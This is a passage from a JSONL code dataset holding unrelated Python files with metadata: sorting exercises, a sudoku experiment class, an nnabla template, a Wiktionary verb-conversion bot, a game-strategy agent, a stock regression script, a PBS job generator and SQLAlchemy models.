else:\n audio = np.append(audio, a, axis=None) \n #print('Queue Audio',a.shape) \n file.write(a)\n #print(audio_queue.get())\n count+=1\n #print(count)\n file.close()\n\n\n","sub_path":"1_getaudio.py","file_name":"1_getaudio.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"321022985","text":"from . import phase2Condition\nfrom ..sudoku.grid.house import HouseType\nfrom ..sudoku.grid.coordinate import Coordinate\nfrom .hiddenSingle import HiddenSingle\nfrom ..misc import utils\n\n\nclass Phase2Trial:\n\n def __init__(self,\n condition: phase2Condition,\n tutorial_goal,\n tutorial_house_type,\n digit_set1: set,\n digit_set2: set):\n self.condition = condition\n digit_set = digit_set2 if self.condition.digit_set else digit_set1\n self.hidden_single = self.create_hidden_single(tutorial_goal, tutorial_house_type, digit_set)\n\n def create_hidden_single(self, tutorial_goal, tutorial_house_type, digit_set):\n house_type = HouseType.Column if tutorial_house_type == HouseType.Row else HouseType.Row\n house_type = house_type if self.condition.house_type else tutorial_house_type\n\n if house_type == HouseType.Row:\n if self.condition.house_index:\n x = utils.sample(set(range(9)) - {tutorial_goal.x}, 1)\n else:\n x = tutorial_goal.x\n\n if self.condition.cell_index:\n y = utils.sample(set(range(9)) - {tutorial_goal.y}, 1)\n else:\n y = tutorial_goal.y\n else:\n if self.condition.house_index:\n y = utils.sample(set(range(9)) - {tutorial_goal.y}, 1)\n else:\n y = tutorial_goal.y\n\n if self.condition.cell_index:\n x = utils.sample(set(range(9)) - {tutorial_goal.x}, 1)\n else:\n x = tutorial_goal.x\n\n goal = Coordinate(x, y)\n return HiddenSingle(goal, house_type, digit_set)\n\n def package(self):\n return {'condition': utils.as_dict(self.condition),\n 'hidden_single': self.hidden_single.package()}","sub_path":"python/hiddensingles/experiment/phase2Trial.py","file_name":"phase2Trial.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"388683734","text":"def swap(A,p,q):\r\n tmp = A[p]\r\n A[p] = A[q]\r\n A[q] = tmp\r\nK = [50,20,70,10]\r\n##swap(K,1,3)\r\n##print(K)\r\n\r\ndef cariPosisiYangTerkecil(A, dariSini, sampaiSini):\r\n posisiYangTerkecil = dariSini #-> anggap ini yang terkecil\r\n for i in range(dariSini+1, sampaiSini): #-> cari di sisa list\r\n if A[i] < A[posisiYangTerkecil]: #-> kalau menemukan yang lebih kecil\r\n posisiYangTerkecil = i #-> anggap diubah\r\n return posisiYangTerkecil\r\nA = [18,13,44,25,66,107,78,89]\r\n##j = cariposisiterkecil(A,2,len(A))\r\n##print(j)\r\n\r\ndef kecil(a):\r\n ter = 0\r\n for i in range(ter,len(a)):\r\n if a[i] < a[ter]:\r\n ter = i\r\n return ter\r\n##f = kecil(A)\r\n##print(f)\r\n\r\ndef bubbleSort(A):\r\n n = len(A)\r\n for i in range(n-1): #->Lakukan operasi gelembung sebanyak n-1\r\n for j in range(n-i-1): #->Dorong elemen terbesar ke ujung kanan\r\n if A[j] > A[j+1]: #->Jika di kiri lebih besar dari di kanannya,\r\n swap(A,j,j+1) #>tukar posisi elemen ke j dengan ke j+1\r\n##bubblesort(A)\r\n##print(A)\r\n \r\ndef selectSort(A):\r\n n = len(A)\r\n for i in range(n-1):\r\n indexKecil = cariPosisiYangTerkecil(A, i, n)\r\n if indexKecil != i:\r\n swap(A, i, indexKecil)\r\n##selectionsort(K)\r\n##print(K)\r\n \r\ndef insertionSort(A):\r\n n = len(A)\r\n for i in range(1,n):\r\n nilai = A[i]\r\n pos = i\r\n while pos > 0 and nilai < A[pos-1]: #->Cari posisi yang tepat\r\n A[pos] = A[pos-1] # dan geser ke kanan terus\r\n pos = pos-1 # nilai - nilai yang lebih besar\r\n A[pos] = nilai #->Pada posisi ini ditempatkan nilai elemen ke i.\r\nP=[10,51,2,18,4,31,13,5,23,64,29]\r\n##insertionsort(P)\r\n##print(P)\r\n","sub_path":"LatihanModulke5.py","file_name":"LatihanModulke5.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"528842864","text":"# Copyright (c) 2017 Sony Corporation. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n#\n# *WARNING*\n# THIS FILE IS AUTO-GENERATED BY CODE GENERATOR.\n# PLEASE DO NOT EDIT THIS FILE BY HAND!\n# If you want to modify this file, edit following files.\n# - build-tools/code_generator/templates/python_src_nnabla_function_bases_py_template.py\n# - build-tools/code_generator/generator/generate_python_src_nnabla_function_bases_py.py\n\nfrom __future__ import absolute_import\n\nfrom .context import get_current_context\nfrom . import function as F\nfrom .auto_forward import get_auto_forward\n\nimport inspect\n\n\n# Templates for function_api source building.\nFUNCTION_API_HEADER = \"def {{name}}{{signature}}:\"\nFUNCTION_API_BODY = '''ctx = get_current_context()\nreturn _func_(ctx, {{shortsignature}})'''\n\n\ndef function_api(func):\n \"\"\"\n Decorator for making function called with current context.\n Some tricky things are done here so that signature and docstring are available.\n \"\"\"\n name = func.__name__\n doc = func.__doc__\n if doc is None:\n doc = \"No docstring.\"\n\n # Parsing argspecs\n spec = inspect.getargspec(func)\n defaults = spec.defaults\n if spec.defaults is None:\n defaults = None\n elif len(spec.defaults) == len(spec.args):\n defaults = defaults[1:]\n # Creating signature\n # e.g. (x, weights, biases=None, n_outputs=None)\n signature = inspect.formatargspec(\n spec.args[1:], spec.varargs, spec.keywords, defaults)\n # Creating signature without parans and defaults\n # e.g. x, weights, biases, n_outputs\n shortsignature = inspect.formatargspec(\n spec.args[1:], spec.varargs, spec.keywords, None)[1:-1]\n\n # Create code by string\n src = (FUNCTION_API_HEADER + '\\n' + '\\n'.join(map(lambda x: ' ' +\n x, FUNCTION_API_BODY.splitlines()))).format(**locals())\n\n # Evaluate source code from string\n code = compile(src, \"<{{name}}>\".format(**locals()), 'single')\n execdict = dict(_func_=func, get_current_context=get_current_context)\n exec(code, execdict)\n\n # Get created function.\n newfunc = execdict[name]\n # DOC newfunc.__doc__ = FUNCTION_API_DOC.format(**locals())\n doc += '''\n\n Note:\n All nnabla functions in :obj:`nnabla.functions` are decorated with the :obj:`nnabla.function_bases.function_api` decorator,\n which queries the current context and passes it into the first argument of the\n original function. The original function always takes a context as the first argument.\n\n '''\n newfunc.__doc__ = doc\n newfunc.__source__ = src\n newfunc.__function_api_base__ = func\n newfunc.__module__ = __name__\n return newfunc\n\n\n{function_apis}\n","sub_path":"build-tools/code_generator/templates/python_src_nnabla_function_bases_py_template.py","file_name":"python_src_nnabla_function_bases_py_template.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"499360968","text":" \r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport time\r\n\r\nstart=time.time();\r\n\r\nL1=1;\r\nL2=1;\r\nT1=100;\r\nT2=200;\r\nT3=300;\r\nT4=400;\r\n\r\ndx=dy=0.1;\r\ndt=0.00001;\r\n\r\nalpha=0.5;\r\n\r\ndt_stream = 0.002\r\nepsilon_stream = 1.0e-2\r\nrx=alpha*(dt)/dx**2;\r\nry=alpha*(dt)/dy**2;\r\n\r\nN=int(L1/dx)+1;\r\nM=int(L2/dy)+1;\r\n\r\nT_n=np.zeros([N,M]);\r\nT_n1=np.zeros([N,M]);\r\nT_n2=np.zeros([N,M]);\r\n\r\n# Boundary Condition's\r\n\r\nfor j in range (0,M):\r\n i=0;\r\n T_n[i][j]=T_n1[i][j]=T_n2[i][j]=T1;\r\nfor j in range (0,M):\r\n i=N-1;\r\n T_n[i][j]=T_n1[i][j]=T_n2[i][j]=T3;\r\nfor i in range (0,N-1):\r\n j=0;\r\n T_n[i][j]=T_n1[i][j]=T_n2[i][j]=T2;\r\nfor i in range (0,N-1):\r\n j=M-1;\r\n T_n[i][j]=T_n1[i][j]=T_n2[i][j]=T4;\r\n\r\n \r\n#Time stepping\r\ner=[];\r\nfor t in range (1000):\r\n for k in range (100):\r\n \r\n #step 1\r\n for i in range (1,N-1):\r\n for j in range (1,M-1):\r\n T_n1[i][j]=(rx*T_n1[i-1][j]+(1-ry-rx)*T_n[i][j]+rx*T_n[i+1][j]/\r\n +ry*T_n1[i][j-1]+ry*T_n[i][j+1])/(1+rx+ry);\r\n #Step 2\r\n for i in range (N-2,0,-1):\r\n for j in range (M-2,0,-1):\r\n T_n2[i][j]=(rx*T_n1[i-1][j]+(1-ry-rx)*T_n1[i][j]+rx*T_n2[i+1][j]/\r\n +ry*T_n1[i][j-1]+ry*T_n2[i][j+1])/(1+rx+ry); \r\n error = 0.0;\r\n for i in range(0,N):\r\n for j in range(0,M):\r\n error = error + (T_n1[i][j] - T_n[i][j])**2\r\n er.append(error);\r\n T_n[i][j] = T_n2[i][j]\r\n error = np.sqrt(error/(M*N))\r\n print(\"timestep\", t, \"error=\", error/epsilon_stream, \"iteration number\", k)\r\n er.append(error/epsilon_stream);\r\n if (error/dt_stream)\", \"|\", value)\n existing_args = find_old_template_props(template, pagemsg, verbose)\n if existing_args is None:\n return None\n difvals = []\n for prop in all_verb_props:\n curval = existing_args.get(prop, \"\").strip()\n newval = args.get(\"forms.\" + prop, \"\").strip()\n if curval == newval:\n continue\n elif \",\" in curval and \",\" in newval:\n curvalset = set(re.split(\",\", curval))\n newvalset = set(re.split(\",\", newval))\n if curvalset == newvalset:\n continue\n difvals.append((prop, (curval, newval)))\n return difvals\n\ndef process_page(page, index, parsed):\n global args\n verbose = args.verbose\n pagetitle = str(page.title())\n subpagetitle = re.sub(\"^.*:\", \"\", pagetitle)\n def pagemsg(txt):\n msg(\"Page %s %s: %s\" % (index, pagetitle, txt))\n\n def expand_text(tempcall):\n return blib.expand_text(tempcall, pagetitle, pagemsg, verbose)\n\n pagemsg(\"Processing\")\n\n if \":\" in pagetitle:\n pagemsg(\"WARNING: Colon in page title, skipping\")\n return\n\n text = str(page.text)\n\n notes = []\n parsed = blib.parse_text(text)\n for t in parsed.filter_templates():\n name = str(t.name)\n if name in templates_to_change or name in refl_templates_to_change:\n refl = name in refl_templates_to_change\n difvals = compare_conjugation(index, page, t, refl, pagemsg, expand_text, verbose)\n if difvals is None:\n pass\n elif difvals:\n difprops = []\n for prop, (oldval, newval) in difvals:\n difprops.append(\"%s=%s vs. %s\" % (prop, oldval or \"(missing)\", newval or \"(missing)\"))\n pagemsg(\"WARNING: Different conjugation when changing template %s to {{fr-conj-auto}}: %s\" %\n (str(t), \"; \".join(difprops)))\n else:\n aux = \"\"\n for param in t.params:\n pname = str(param.name)\n pval = str(param.value)\n if not pval.strip():\n continue\n if (pname not in [\"1\", \"2\", \"3\", \"aux\", \"sort\", \"cat\"] or\n pname == \"3\" and pval not in [\"avoir\", \"être\", \"avoir or être\"]):\n pagemsg(\"WARNING: Found extra param %s=%s in %s\" %\n (pname, pval, str(t)))\n if pname == \"aux\" and pval != \"avoir\":\n aux = pval\n pagemsg(\"Found non-avoir auxiliary aux=%s in %s\" % (\n pval, str(t)))\n auxpname = (\"3\" if name in [\"fr-conj-e-er\", \"fr-conj-ir (s)\"] else\n \"aux\" if name in [\"fr-conj-xx-er\", \"fr-conj-é-er\"] else \"2\")\n if pname == auxpname and pval != \"avoir\":\n aux = pval\n pagemsg(\"Found non-avoir auxiliary %s=%s in %s\" % (\n pname, pval, str(t)))\n oldt = str(t)\n del t.params[:]\n t.name = \"fr-conj-auto\"\n if refl:\n t.add(\"refl\", \"yes\")\n if aux:\n t.add(\"aux\", aux)\n newt = str(t)\n pagemsg(\"Replacing %s with %s\" % (oldt, newt))\n notes.append(\"replaced {{%s}} with %s\" % (name, newt))\n\n return str(parsed), notes\n\nparser = blib.create_argparser(\"Convert old fr-conj-* to fr-conj-auto\",\n include_pagefile=True)\nargs = parser.parse_args()\nstart, end = blib.parse_start_end(args.start, args.end)\n\nblib.do_pagefile_cats_refs(args, start, end, process_page, edit=True,\n default_cats=[\"French verbs\"])\n","sub_path":"fix_fr_verb.py","file_name":"fix_fr_verb.py","file_ext":"py","file_size_in_byte":8608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350080488","text":"from testkit.cluster import Cluster\n\n\ndef test_pindex_distribution():\n\n # the test itself doesn't have to do anything beyond calling cluster.reset() with the\n # right configuration, since the validation of the cbgt pindex distribution is in the\n # cluster.reset() method itself.\n cluster = Cluster()\n mode = cluster.reset(config_path=\"resources/sync_gateway_configs/performance/sync_gateway_default_performance.json\")\n\n # Verify all sync_gateways are running\n errors = cluster.verify_alive(mode)\n assert(len(errors) == 0)\n\n\n\n\n","sub_path":"testsuites/syncgateway/functional/test_cbgt_pindex.py","file_name":"test_cbgt_pindex.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"179506826","text":"from enum import Enum\n\nimport numpy as np\nimport math\nimport lib.config as C\nimport lib.utils as U\nimport time\n\nfrom strategy.agent import Agent as A\nfrom unit.units import Army\n\nimport unit.protoss_unit as P\n\n\nclass ProtossAction(Enum):\n Do_nothing = 0\n Build_worker = 1\n Build_zealot = 2\n Build_pylon = 3\n Build_gateway = 4\n Attack = 5\n Move = 6\n Defend = 7\n Build_sub_base = 8\n Build_cannon = 9\n All = 10\n\n\nclass Protoss(A):\n\n def __init__(self, agent_id=0, global_buffer=None, net=None, restore_model=False):\n A.__init__(self, agent_id=agent_id, global_buffer=global_buffer,\n net=net, restore_model=restore_model)\n self.gateway_num = 0\n self.pylon_num = 0\n self.zealot_num = 0\n self.collected_mineral = 0\n self.MAX_ACTIONS = ProtossAction.All.value\n\n def __str__(self):\n return str(self.time_seconds) + ', ' + str(self.mineral) + \\\n ', ' + str(self.mineral_worker_nums) + ', ' + str(self.zealot_num) + ', ' + str(self.food_cap)\n\n def reset(self):\n super().reset()\n self.gateway_num = 0\n self.pylon_num = 0\n self.zealot_num = 0\n self.collected_mineral = 0\n\n def obs(self):\n simple_input = np.zeros([11])\n simple_input[0] = 0 # self.time_seconds\n simple_input[1] = self.mineral_worker_nums\n simple_input[2] = self.gas_worker_nums\n simple_input[3] = self.mineral\n simple_input[4] = self.gas\n simple_input[5] = self.food_cap\n simple_input[6] = self.food_used\n simple_input[7] = self.army_nums\n simple_input[8] = self.gateway_num\n simple_input[9] = self.pylon_num\n simple_input[10] = self.zealot_num\n return simple_input\n\n def set_obs(self, state):\n self.mineral_worker_nums = state[1]\n self.gas_worker_nums = state[2]\n self.mineral = state[3]\n self.gas = state[4]\n self.food_cap = state[5]\n self.food_used = state[6]\n self.army_nums = state[7]\n self.gateway_num = state[8]\n self.pylon_num = state[9]\n self.zealot_num = state[10]\n\n def get_next_state(self, action):\n self.env.step(self.player_id, action)\n return self.obs()\n\n @property\n def result(self):\n return self._result\n\n def play_with_mpc(self, verbose=False):\n max_steps = 100\n state_now = self.obs()\n if verbose:\n print('initial state:', state_now)\n print('initial env:', self.env)\n state_last, action_last = None, None\n for i in range(max_steps):\n if self.is_end or i == max_steps - 1:\n if verbose:\n print(self.local_buffer.rewards)\n if self.env.win_index == self.player_id:\n pass\n self._result = sum(self.local_buffer.rewards)\n # self.global_buffer.add(self.local_buffer)\n break\n\n if state_last is not None:\n reward = self.get_mineral_reward(state_last, state_now)\n if True:\n print('reward:', reward)\n self.local_buffer.append(state_last, action_last, state_now, reward, 0, 0)\n\n action, v_preds = self.mpc.get_action(state_now, agent_clone=self, verbose=verbose)\n state_last = state_now\n state_now = self.get_next_state(action)\n if verbose:\n print('state now:', state_now.astype(dtype=np.int32))\n time.sleep(1)\n action_last = action\n\n def play_with_rl(self, verbose=False):\n max_steps = 125\n state_now = self.obs()\n if verbose:\n print('initial state:', state_now)\n print('initial env:', self.env)\n\n state_last, action_last = None, None\n for i in range(max_steps):\n if self.is_end or i == max_steps - 1:\n if self.env.win_index == self.player_id:\n ratio = (i + 1) / float(max_steps)\n the_reward = 1. - ratio / 1.5\n self.local_buffer.rewards[-1] += the_reward\n self._result = the_reward\n\n if verbose:\n print(self.local_buffer.rewards)\n\n #self._result = sum(self.local_buffer.rewards)\n self.global_buffer.add(self.local_buffer)\n break\n\n if state_last is not None:\n reward = 0 # = self.get_pop_reward(state_last, state_now)\n if 0:\n print('reward:', reward)\n v_preds_next = self.net.policy.get_values(state_now)\n v_preds_next = self.get_values(v_preds_next)\n self.local_buffer.append(state_last, action_last, state_now, reward, v_preds, v_preds_next)\n\n action, v_preds = self.net.policy.get_action(state_now, verbose=False)\n state_last = state_now\n state_now = self.get_next_state(action)\n if verbose:\n print('state now:', state_now.astype(dtype=np.int32))\n print('action:', action)\n time.sleep(1)\n action_last = action\n\n def get_pop_reward(self, state_last, state_now):\n pop_reward = state_now[6] - state_last[6]\n return pop_reward\n\n def get_mineral_reward(self, state_last, state_now):\n mineral_reward = state_now[3] - state_last[3]\n return mineral_reward\n\n def get_values(self, values):\n # check if the game is end\n if self.is_end and self.result != 0:\n return 0\n else:\n return values\n\n def get_action_by_policy(self, obs):\n act, v_preds = self.net.policy.get_action(obs, verbose=True)\n return act, v_preds\n\n '''def get_policy_action(self, obs):\n random = np.random.randint(self.MAX_ACTIONS)\n action = random\n return action'''\n\n def fullfill_technology(self, unit):\n if type(unit) == P.Zealot:\n if self.gateway_num > 0:\n return True\n\n return False\n\n def fullfill_creature_condition(self, unit):\n if self.mineral >= unit.mineral_price and self.gas >= unit.gas_price:\n if self.food_cap >= self.food_used + unit.food_used and self.fullfill_technology(unit):\n return True\n else:\n return False\n\n def win(self):\n if self.zealot_num >= 8:\n return True\n else:\n return False\n\n def get_build_num(self, unit):\n max_n = self.gateway_num\n n = 1\n #print('max_n:', max_n)\n for i in range(max_n):\n if unit.mineral_price * i < self.mineral and unit.food_used * i + self.food_used < self.food_cap:\n continue\n else:\n n = i - 1\n break\n #print('n:', n)\n return n\n\n def step(self, action):\n if action == ProtossAction.Build_worker.value:\n if self.mineral >= 50 and self.food_used < self.food_cap:\n self.mineral_worker_nums += 1\n self.food_used += 1\n self.mineral -= 50\n elif action == ProtossAction.Build_zealot.value:\n Zealot = P.Zealot()\n if self.fullfill_creature_condition(Zealot):\n n = self.get_build_num(Zealot)\n self.army_nums += n\n self.zealot_num += n\n self.food_used += Zealot.food_used * n\n self.mineral -= Zealot.mineral_price * n\n self.add_unit(Zealot, n)\n elif action == ProtossAction.Build_pylon.value:\n if self.mineral >= 100:\n self.building_nums += 1\n self.food_cap += 8\n self.pylon_num += 1\n self.mineral -= 100\n elif action == ProtossAction.Build_gateway.value:\n if self.mineral >= 150 and self.pylon_num >= 1:\n self.gateway_num += 1\n self.building_nums += 1\n self.mineral -= 150\n elif action == ProtossAction.Attack.value:\n if self.military_num() > 0:\n #print('order:', self.env.army[self.player_id].order)\n self.env.army[self.player_id].order = Army.Order.ATTACK\n #print('order:', self.env.army[self.player_id].order)\n\n elif action == ProtossAction.Defend.value:\n if self.military_num() > 0:\n self.env.army[self.player_id].order = Army.Order.DEFEND\n elif action == ProtossAction.Build_sub_base.value:\n pass\n elif action == ProtossAction.Build_cannon.value:\n pass\n\n # update mineral\n self.collected_mineral += min(self.mineral_worker_nums, 16) * 3\n if self.collected_mineral <= 10000:\n self.mineral += min(self.mineral_worker_nums, 16) * 3\n\n self.time_seconds += 5\n\n # update population\n if self.military_num() == 0:\n #print('order:', self.env.army[self.player_id].order)\n self.env.army[self.player_id].order = Army.Order.NOTHING\n #print('order:', self.env.army[self.player_id].order)\n else:\n self.army_nums = self.military_num()\n self.zealot_num = self.military_num()\n self.food_used = self.military_num() * 2 + self.mineral_worker_nums + self.gas_worker_nums\n","sub_path":"TG-zerg and TG-Terran/Terran/strategy/protoss_agent.py","file_name":"protoss_agent.py","file_ext":"py","file_size_in_byte":9413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92867609","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jan 30 21:03:33 2017\r\n\r\n@author: vishalkr71\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn import svm\r\n\r\n#Reading of Data \r\ndef readdata(): \r\n start_date=\"2016-01-01\"\r\n end_date=\"2016-01-20\"\r\n symbols=['HERO']\r\n dates=pd.date_range(start_date,end_date)\r\n df1=pd.DataFrame(index=dates)\r\n for symbol in symbols:\r\n df1=pd.read_csv(\"{}.csv\".format(symbol),index_col=\"Date\",parse_dates=True,\r\n usecols=['Date','Open','Close','Adj Close',],na_values=['nan'])\r\n df1=df1.sort_index()\r\n print(df1)\r\n return df1\r\n\r\n#Division of stock in training and testing data\r\ndef division(dataset):\r\n opening=dataset.ix[:,1]\r\n closing=dataset.ix[:,2]\r\n openingPriceTrain, openingPriceTest, closingPriceTrain, closingPriceTest =\\\r\n train_test_split(opening, closing, test_size=0.25, random_state=42)\r\n openingPriceTrain = np.reshape(openingPriceTrain, (openingPriceTrain.size, 1))\r\n closingPriceTrain = np.reshape(closingPriceTrain, (closingPriceTrain.size, 1))\r\n openingPriceTest = np.reshape(openingPriceTest, (openingPriceTest.size, 1))\r\n closingPriceTest = np.reshape(closingPriceTest, (closingPriceTest.size, 1))\r\n\r\n sampledData = {\"openingPriceTrain\":openingPriceTrain, \"closingPriceTrain\":closingPriceTrain,\r\n \"openingPriceTest\":openingPriceTest, \"closingPriceTest\":closingPriceTest}\r\n return sampledData\r\n\r\n#Random Forest Regression \r\ndef predictRandomForestReg(data, priceToPredict):\r\n openingPriceTrain, openingPriceTest, closingPriceTrain, closingPriceTest = \\\r\n data[\"openingPriceTrain\"], data[\"openingPriceTest\"], data[\"closingPriceTrain\"], data[\"closingPriceTest\"]\r\n clf = RandomForestRegressor(n_estimators=10)\r\n clf = clf.fit(openingPriceTrain, closingPriceTrain)\r\n print(clf.predict(priceToPredict))\r\n score=clf.score(openingPriceTest, closingPriceTest)\r\n print(\"Accuracy:\")\r\n print(score)\r\n calculated=clf.predict(openingPriceTest)\r\n ax = plt.subplots()\r\n ax.scatter(openingPriceTrain, closingPriceTrain)\r\n ax.set_ylabel('Predicted SVM')\r\n ax.scatter(closingPriceTest,calculated )\r\n ax.set_xlabel('Measured')\r\n ax.set_ylabel('Predicted')\r\n plt.show()\r\n \r\n#Support Vector Regression \r\ndef predict(data, priceToPredict):\r\n openingPriceTrain, openingPriceTest, closingPriceTrain, closingPriceTest = \\\r\n data[\"openingPriceTrain\"], data[\"openingPriceTest\"], data[\"closingPriceTrain\"], data[\"closingPriceTest\"]\r\n openingPriceTrain.reshape(-1,1)\r\n closingPriceTrain.reshape(-1,1)\r\n clf = svm.LinearSVR()\r\n clf.fit(openingPriceTrain, closingPriceTrain)\r\n print(clf.predict(priceToPredict))\r\n score = clf.score(openingPriceTest, closingPriceTest)\r\n print(\"Accuracy:\")\r\n print(score)\r\n \r\n#Main Function\r\nif __name__ == \"__main__\":\r\n dataset = readdata()\r\n sampledData= division(dataset)\r\n priceToPredict=3000\r\n print(\"Random Forest Regressor Prediction:\")\r\n predictRandomForestReg(sampledData, priceToPredict)\r\n print(\"SVM Prediction:\")\r\n predict(sampledData, priceToPredict)","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"341814597","text":"#!/usr/bin/python3\nfrom os import path\nfrom platform import machine\nfrom sys import argv\n\ndef get_dropbox_version(directory):\n \"\"\"\n Corrects the hardcoded dropbox directory\n Args:\n directory(str): the default dropbox directory\n \"\"\"\n version_file = directory.split(\"{dropbox_version}\")[0].split(\"/\")\n del version_file[len(version_file) - 1]\n version_file = \"/\".join(version_file) + \"/VERSION\"\n if path.exists(version_file):\n with open(version_file) as f:\n return f.read()\n return \"\"\n\ndropbox_path = argv[1]\ndropbox_path = dropbox_path.replace(\"{arch}\", machine())\ndropbox_path = dropbox_path .replace(\n \"{dropbox_version}\", get_dropbox_version(dropbox_path))\nprint(dropbox_path)\n","sub_path":"database/scripts/dropbox.py","file_name":"dropbox.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"547139436","text":"#genJobfile.py\n\"\"\"\nmore-or-less automated generation of PBS jobfile\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser(prog=\"genJobfile.py\",\n description=\"PBS Jobfile generation script.\")\n\nparser.add_argument('jobfileName',type=str)\nparser.add_argument('jobName',type=str)\nparser.add_argument('nnodes',type=int)\nparser.add_argument('ppn',type=int)\nparser.add_argument('mpi_procs_per_node',type=int)\nparser.add_argument('ompthreads_per_node',type=int)\nparser.add_argument('runtimeNumHours',type=int)\nparser.add_argument('queue',type=str)\nparser.add_argument('latticeType',type=str)\nparser.add_argument('partitionType',type=str)\n\n\n# parse input arguments\nargs = parser.parse_args()\n\n# assign to the variables\n\njobfileName = args.jobfileName\njobName = args.jobName\nnnodes = args.nnodes\nppn = args.ppn\nmpi_procs_per_node = args.mpi_procs_per_node\nompthreads_per_node=args.ompthreads_per_node\nruntimeNumHours = args.runtimeNumHours\nqueue = args.queue\nlatticeType = args.latticeType\npartitionType = args.partitionType\n\n# make these additional arguments?\ngeom_file = 'channel_cavity_geom.py'\nrun_script = 'run_chanCav_grace.sh'\nN_divs=21\npp_bool=1\ndynamics=3\n\n\nfilesToCopy = ['FluidChannel.py', 'pyLattice.py', 'pyNFC.py', 'pyNFC_run.py',\n 'pyNFC_Util.py', 'validate.py', 'vtkHelper.py', run_script,\n 'pyPartition.py','pyNFC_preprocess.py','pyNFC_partition.py',\n 'partition_suggestion.py','partition_compare.py',\n 'LBM_Interface.so','PartitionHelper.so','processNFC.py','hdf5Helper.py',geom_file]\n\n\n\nif runtimeNumHours < 10:\n walltime = \"0%d:00:00\"%runtimeNumHours\nelse:\n walltime = \"%d:00:00\"%runtimeNumHours # may be a problem if runtime > 99 hours\n \nmpi_procs = mpi_procs_per_node*nnodes\n\njobfileName = \"%s.pbs\"%(jobfileName)\n#--------- more-or-less fixed code below -----------------\n\nproj_id = 'USNAM37752431'\n\n# open the file\njf = open(jobfileName,'w')\n\n# essential PBS directives\njf.write('#!/bin/bash \\n') # the shell\n#jf.write('#PBS -A %s \\n'%proj_id) # project identifier\njf.write('#PBS -q %s \\n'%queue) # specify queue\njf.write('#PBS -l select=%d:ncpus=%d:mpiprocs=%d:ompthreads=%d \\n'% \\\n (nnodes,ppn,mpi_procs_per_node,ompthreads_per_node))\njf.write('#PBS -l walltime=%s \\n'%walltime)\njf.write('#PBS -l ccm=1 \\n') # specify cluster compatibility mode. Why wouldn't you?\n\n#optional PBS directives\njf.write('#PBS -N %s \\n'%jobName)\njf.write('#PBS -j oe \\n')\n#jf.write('#PBS -V \\n')\njf.write('#PBS -S /bin/bash \\n')\n\n\n# Execution block\njf.write('cd /mnt/lustre/scratch/sblair/jobout \\n')\njf.write(\"JOBID=`echo $PBS_JOBID | cut -d '.' -f 1` \\n\")\njf.write('if [ ! -d $JOBID ]; then \\n')\njf.write(' mkdir -p $JOBID \\n')\n\njf.write('fi \\n')\njf.write('cd $JOBID \\n')\n# copy files \nfor s in filesToCopy:\n jf.write('cp $PBS_O_WORKDIR/%s . \\n'% s)\n\n# invoke execution\njf.write('module swap PrgEnv-cray PrgEnv-gnu\\n') #let's just plan on using GNU for now\n#jf.write('module load costinit\\n')\n#jf.write('module load python\\n')\n#jf.write('module load numpy\\n')\n#jf.write('module load scipy\\n')\n#jf.write('module load mpi4py\\n')\n#jf.write('module load boost\\n')\n#jf.write('module load cray-hdf5\\n')\njf.write('source ~/work/projects/venv/bin/activate \\n');\njf.write('./%s %d %s %d %s %d %d %d\\n'%(run_script,N_divs,\n latticeType,dynamics,partitionType,mpi_procs,ompthreads_per_node,pp_bool))\njf.write('deactivate\\n')\njf.close()\n","sub_path":"genJobfile_grace.py","file_name":"genJobfile_grace.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"313474624","text":"from database import db\n\nclass Category(db.Model):\n\t__tablename__ = 'categories'\n\n\tcategory = db.Column(db.Integer, primary_key=True, server_default=db.FetchedValue())\n\tcategoryname = db.Column(db.String(50), nullable=False)\n\nt_cust_hist = db.Table(\n\t'cust_hist',\n\tdb.Column('customerid', db.ForeignKey('customers.customerid', ondelete='CASCADE'), nullable=False,index=True),\n\tdb.Column('orderid', db.Integer, nullable=False),\n\tdb.Column('prod_id', db.Integer, nullable=False))\n\n\nclass Customer(db.Model):\n\t__tablename__ = 'customers'\n\n\tcustomerid = db.Column(db.Integer, primary_key=True, server_default=db.FetchedValue())\n\tfirstname = db.Column(db.String(50), nullable=False)\n\tlastname = db.Column(db.String(50), nullable=False)\n\taddress1 = db.Column(db.String(50), nullable=False)\n\taddress2 = db.Column(db.String(50))\n\tcity = db.Column(db.String(50), nullable=False)\n\tstate = db.Column(db.String(50))\n\tzip = 